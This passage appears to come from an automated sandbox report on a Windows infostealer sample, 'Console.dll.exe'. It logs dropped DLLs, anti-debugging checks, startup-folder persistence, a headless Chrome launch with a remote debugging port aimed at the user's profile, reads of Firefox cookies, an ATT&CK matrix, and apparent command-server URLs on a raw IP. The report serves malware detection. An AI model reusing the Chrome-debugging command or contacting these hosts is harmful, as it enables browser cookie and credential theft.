            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.DiagnosticSource.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encodings.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SuperSocket.ClientEngine.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Channels.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.Local.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 7304 Thread sleep count: 88 > 30
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 7624 Thread sleep count: 85 > 30
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 7304 Thread sleep count: 121 > 30
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 5496 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe TID: 8056 Thread sleep count: 389 > 30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe TID: 8048 Thread sleep count: 73 > 30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe TID: 7752 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_01215200 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessAffinityMask,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,0_2_01215200
            Source: C:\Users\user\Desktop\Console.dll.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Thread delayed: delay time: 922337203685477
            Source: Console.dll.exe, 00000000.00000002.1630961022.0000000009A00000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1736658205.0000020FCDB37000.00000004.00000020.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000003.1994359323.0000000008D30000.00000004.00000020.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000002.2001847148.0000000008D3F000.00000004.00000020.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000003.1994691480.0000000008D3F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2551193176.0000023E85508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Console.dll.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_01229A40 rdtsc 0_2_01229A40
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_011852A0 IsDebuggerPresent,0_2_011852A0
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_0141B5D0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary,GetCurrentProcess,VirtualFree,VirtualFree,GetCurrentProcess,VirtualFree,GetCurrentProcess,VirtualProtect,0_2_0141B5D0
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_012D2160 GetProcessHeap,HeapAlloc,0_2_012D2160
            Source: C:\Users\user\Desktop\Console.dll.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_01418400 VirtualProtect,GetTickCount,VirtualProtect,GetSystemInfo,SetConsoleCtrlHandler,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,DebugBreak,SleepEx,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,InitializeCriticalSection,InitializeCriticalSection,VirtualAlloc,DebugBreak,InitializeCriticalSection,0_2_01418400
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_014AB6D9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_014AB6D9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Code function: 7_2_008E8400 VirtualProtect,GetTickCount,VirtualProtect,GetSystemInfo,SetConsoleCtrlHandler,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,DebugBreak,SleepEx,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,InitializeCriticalSection,InitializeCriticalSection,VirtualAlloc,DebugBreak,InitializeCriticalSection,7_2_008E8400
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Code function: 7_2_0097B6D9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0097B6D9
            Source: C:\Users\user\Desktop\Console.dll.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_01010950 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode,0_2_01010950
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Code function: 7_2_004E0950 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode,7_2_004E0950
            Source: C:\Users\user\Desktop\Console.dll.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_01478270 cpuid 0_2_01478270
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_012521F0 CreateNamedPipeA,GetLastError,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,CreateEventW,GetLastError,ConnectNamedPipe,GetLastError,0_2_012521F0
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_014AC31E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_014AC31E

            Stealing of Sensitive Information

            Source: C:\Users\user\Desktop\Console.dll.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\Console.dll.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite

            Remote Access Functionality

            Source: C:\Users\user\Desktop\Console.dll.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 12 Registry Run Keys / Startup Folder | 112 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 12 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 112 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 1 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            Source | Detection | Scanner | Label | Link
            Console.dll.exe | 5% | ReversingLabs | Win32.Malware.Generic |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://178.23.190.70:3000/0 | 0% | Avira URL Cloud | safe |
            https://www.vign.com/CPS04 | 0% | Avira URL Cloud | safe |
            http://anglebug.com/3625n | 0% | Avira URL Cloud | safe |
            http://178.23.190.70:3000/madbruh | 0% | Avira URL Cloud | safe |
            http://178.23.190.70:3000/madbruhX | 0% | Avira URL Cloud | safe |
            http://178.23.190.70:3000/d | 0% | Avira URL Cloud | safe |
            http://178.23.190.70:3000/madbruh)File | 0% | Avira URL Cloud | safe |
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            http://178.23.190.70:3000/madbruh | false | Avira URL Cloud: safe | unknown
                                                                                            unknown
                                                                                            https://aka.ms/dotnet-illink/comConsole.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000000.00000002.1645448627.000000006D2D2000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006D2D2000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                              high
                                                                                              https://issuetracker.google.com/161903006chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://anglebug.com/7172chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://anglebug.com/7899chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://178.23.190.70:3000/madbruh)FileConsole.dll.exefalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://anglebug.com/7279chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://anglebug.com/3078chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://anglebug.com/7036chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://anglebug.com/7553chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://anglebug.com/5375chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anglebug.com/6860chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://anglebug.com/5371chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://anglebug.com/4722chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://anglebug.com/5658chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://anglebug.com/5535chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.newtonsoft.com/jsonschemaConsole.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                                                          high
                                                                                                                          http://anglebug.com/4324chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://anglebug.com/7556chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/dotnet/runtime/issues/50821Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/ericsink/SQLitePCL.rawSQLitePCLRaw.core.dll.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://178.23.190.70:3000/dConsole.dll.exe, 00000000.00000002.1628910650.0000000005D06000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://issuetracker.google.com/187425444chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://aka.ms/dotnet/downloadConsole.dll.exe, Console.dll.exe.0.drfalse
                                                                                                                                      high
                                                                                                                                      http://178.23.190.70:3000/madbruhXConsole.dll.exe, 00000000.00000002.1629219762.0000000008E40000.00000004.00001000.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000002.2001043438.0000000008660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://html4/loose.dtdConsole.dll.exe, Console.dll.exe.0.drfalse
                                                                                                                                        high
                                                                                                                                        http://anglebug.com/3584chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://anglebug.com/4551chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://anglebug.com/5881chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://anglebug.com/6692chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/mono/linker/pull/2125.Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://issuetracker.google.com/258207403chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://issuetracker.google.com/253522366chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://anglebug.com/3502chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://anglebug.com/3623chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3625chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/3624chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2553789982.0000179400244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
